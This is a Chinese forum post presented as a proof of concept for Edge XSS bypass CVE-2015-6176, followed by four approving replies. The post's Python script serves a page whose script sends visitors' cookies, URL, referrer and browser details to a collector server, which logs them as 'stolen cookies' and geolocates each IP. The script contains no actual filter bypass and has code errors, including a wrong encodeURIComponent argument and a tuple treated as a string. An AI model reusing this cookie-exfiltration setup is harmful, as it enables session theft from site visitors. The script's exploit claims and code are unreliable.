Win10系统Edge浏览器XSS
版本:Windows 10 Version 1511;CVE编号:CVE-2015-6176
Edge 错误处理 HTTP 响应中的 HTML 属性,这使得远程攻击者能够通过未指定的向量绕过跨站点脚本 (XSS) 保护机制
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
# TCP port the page server (ExploitHandler) listens on, bound on all interfaces.
PORT = 8080
# TCP port the collector (CollectorHandler) listens on; the page's script
# beacons to this port, and it is also substituted into HTML_CONTENT.
COLLECTOR_PORT = 9000
# Page served by ExploitHandler at "/" and "/index.html". This is a bytes
# literal, so the {LOCAL_IP} and {COLLECTOR_PORT} placeholders are filled in
# with bytes.replace() in ExploitHandler.do_GET, not with str.format().
# The inline script runs on window.onload, reads document.cookie, the page
# URL, document.referrer and a few navigator/screen values, builds a query
# string from the keys of that object and requests an Image from
# http://{LOCAL_IP}:{COLLECTOR_PORT}/collect — that GET to /collect is the
# request CollectorHandler logs. Script errors only go to console.error.
HTML_CONTENT = b"""<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
var cookies = document.cookie || "";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || "";
var platform = navigator.platform || "";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
"";
var screenRes = screen.width + "x" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + "=" +
encodeURIComponent(data);
}).join("&");
var img = new Image();
img.src = attackerServer + "?" + query;
} catch(e) {
console.error("Error sending data:", e);
}
};
</script>
</head>
<body>
<h1 style="color:red;">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
"""
# Static response body returned by CollectorHandler for GET /collect.
# Nothing from the request is interpolated into it (so the collector does not
# reflect query data); it is encoded as UTF-8 at send time. The background
# image is loaded by the visiting browser from a third-party host.
COLLECTOR_PAGE = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
"""
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
    """Serve HTML_CONTENT at "/" and "/index.html"; every other path gets 404.

    Although this subclasses SimpleHTTPRequestHandler, do_GET is overridden
    completely, so the base class's directory/file serving is never reached.
    The path comparison is exact on self.path, which includes any query
    string, so e.g. "/?x=1" falls through to the 404 branch.
    """

    def do_GET(self) -> None:
        if self.path in ('/', '/index.html'):
            # Placeholder substitution is done on bytes. `local_ip` is the
            # module-level name assigned in the __main__ block.
            content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(
                b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode()
            )
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
    """Receive the beacon GETs and record them.

    Only the path "/collect" is handled; anything else gets a 404. For each
    hit, the query parameters, the client address reported by the server,
    the User-Agent header, a local timestamp and a best-effort ipinfo.io
    lookup are printed to stdout and appended to "collected_data.log" in the
    current working directory. The response body is the static
    COLLECTOR_PAGE; no request data is reflected into it.
    """

    def do_GET(self) -> None:
        parsed_path = parse.urlparse(self.path)
        if parsed_path.path == "/collect":
            # parse_qs maps each key to a *list* of values, so every variable
            # below is a list; the default is a one-element list holding "".
            query = parse.parse_qs(parsed_path.query)
            cookie = query.get("cookie", [""])
            url = query.get("url", [""])
            referrer = query.get("referrer", [""])
            language = query.get("language", [""])
            platform = query.get("platform", [""])
            timezone = query.get("timezone", [""])
            screen = query.get("screen", [""])
            ip = self.client_address
            user_agent = self.headers.get("User-Agent", "Unknown")
            # Local (naive) wall-clock time of the collector host.
            timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            # One outbound HTTPS request to ipinfo.io per hit (see get_location);
            # the request blocks the single-threaded server for up to 3 s.
            location = self.get_location(ip)
            # A non-empty list is truthy even when it only holds the "" default,
            # so this branch runs for every /collect request, with or without
            # a cookie parameter.
            if cookie:
                print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f" URL: {url}")
                print(f" Referrer: {referrer}")
                print(f" Language: {language}")
                print(f" Platform: {platform}")
                print(f" Timezone: {timezone}")
                print(f" Screen Resolution: {screen}")
                print(f" From IP: {ip}")
                print(f" User-Agent: {user_agent}")
                print(f" Location: {location}")
                print("-" * 50)
                # Append the same record to a log file in the working
                # directory; the file handle is closed by the with-block.
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f" URL: {url}\n")
                    f.write(f" Referrer: {referrer}\n")
                    f.write(f" Language: {language}\n")
                    f.write(f" Platform: {platform}\n")
                    f.write(f" Timezone: {timezone}\n")
                    f.write(f" Screen Resolution: {screen}\n")
                    f.write(f" IP: {ip}\n")
                    f.write(f" User-Agent: {user_agent}\n")
                    f.write(f" Location: {location}\n")
                    f.write("-" * 50 + "\n")
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            content = COLLECTOR_PAGE.encode('utf-8')
            self.send_header("Content-Length", str(len(content)))
            self.end_headers()
            self.wfile.write(content)
        else:
            self.send_error(404)

    def get_location(self, ip) -> str:
        """Best-effort geolocation of *ip* via https://ipinfo.io/<ip>/json.

        Makes one outbound request with a 3 second timeout. A non-200 status,
        or any exception (no network, bad JSON, ...), yields the fallback
        string instead. Note that this forwards the visitor's address to a
        third-party service on every hit.
        """
        try:
            resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
            if resp.status_code == 200:
                data = resp.json()
                city = data.get("city", "")
                region = data.get("region", "")
                country = data.get("country", "")
                loc = data.get("loc", "")
                return f"{city}, {region}, {country} (coords: {loc})"
        except Exception:
            # Deliberate best-effort: failures fall through to the fallback.
            pass
        return "Location lookup failed or unavailable"
def get_local_ip():
    """Return the local address used to reach 8.8.8.8, or "127.0.0.1".

    A UDP socket is connect()ed to 8.8.8.8:80 — for UDP this only selects the
    outgoing interface and sends no packet — and the result of getsockname()
    is returned unchanged. Any exception yields "127.0.0.1". The socket is
    closed in all cases.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        ip = s.getsockname()
    except Exception:
        ip = "127.0.0.1"
    finally:
        s.close()
    return ip
def run_exploit_server():
    """Serve ExploitHandler on all interfaces at PORT until interrupted.

    socketserver.TCPServer handles one request at a time. The banner uses
    the module-level `local_ip` set in the __main__ block.
    """
    with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
        print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
        httpd.serve_forever()
def run_collector_server():
    """Serve CollectorHandler on all interfaces at COLLECTOR_PORT until interrupted.

    Single-threaded TCPServer, so each /collect hit (including its ipinfo.io
    lookup) is processed before the next is accepted. The banner uses the
    module-level `local_ip` set in the __main__ block.
    """
    with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd:
        print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
        httpd.serve_forever()
if __name__ == "__main__":
    # Resolved once; ExploitHandler and both server banners read this global.
    local_ip = get_local_ip()
    try:
        print(f"[*] Your server IP is: {local_ip}")
        # The page server runs on a daemon thread so it exits with the main
        # thread; the collector runs in the foreground and receives Ctrl-C.
        exploit_thread = threading.Thread(target=run_exploit_server, daemon=True)
        exploit_thread.start()
        run_collector_server()
    except KeyboardInterrupt:
        print("\n[!] Shutting down servers. Goodbye!")
Re: Win10系统Edge浏览器XSS
感谢分享这个CVE-2015-6176的详细PoC。Edge早期版本对HTML属性的错误处理确实给XSS过滤器留下了绕过的空间,这个利用链通过构造自动加载的Image请求来收集cookie、referrer等敏感信息,手法很经典。对于仍在Win10 1511或更早版本上的用户,建议尽快升级到受支持的版本,同时留意浏览器安全更新。另外,在实际测试时记得替换代码中的IP地址,并且只在受控环境中验证,避免误伤。Re: Win10系统Edge浏览器XSS
感谢分享这个Edge浏览器的XSS绕过漏洞,PoC代码也写得很详细。CVE-2015-6176影响Windows 10早期版本,看来当时Edge在处理HTML属性时确实存在缺陷。这个通过Image GET外传cookie等信息的思路很经典,适合给有安全测试需求的朋友参考。不过建议在实际环境中测试前务必获得授权。Re: Win10系统Edge浏览器XSS
感谢分享这个Win10早期版本Edge的XSS绕过漏洞(CVE-2015-6176)。PoC代码很完整,利用Image GET方式外泄用户敏感信息(cookie、referrer、平台信息等)的思路很清晰。不过需要提醒一下,这个漏洞距今已久,当前主流Edge版本应该已修复,仅适合在测试环境或历史版本中验证。另外运行这类代码时请注意只在可控环境中测试,避免泄露非授权信息。Re: Win10系统Edge浏览器XSS
看到这个CVE-2015-6176,应该是挺老的一个Edge XSS绕过漏洞了,影响Windows 10 1511版本。你贴的PoC代码思路是利用Image请求外带数据,绕过XSS过滤器。对于当时还在用老版Edge的用户,这个漏洞确实有风险,能把cookie、referrer这些敏感信息传出去。 不过现在Edge早就换Chromium内核了,微软也多次更新修复了这类问题。如果你还在用旧版Win10且没打补丁,建议尽快升级系统或更新浏览器,避免被利用。另外,PoC仅供学习验证,别在未授权站点上测试。感谢分享,给研究旧版浏览器安全的同学们当个案例还是不错的。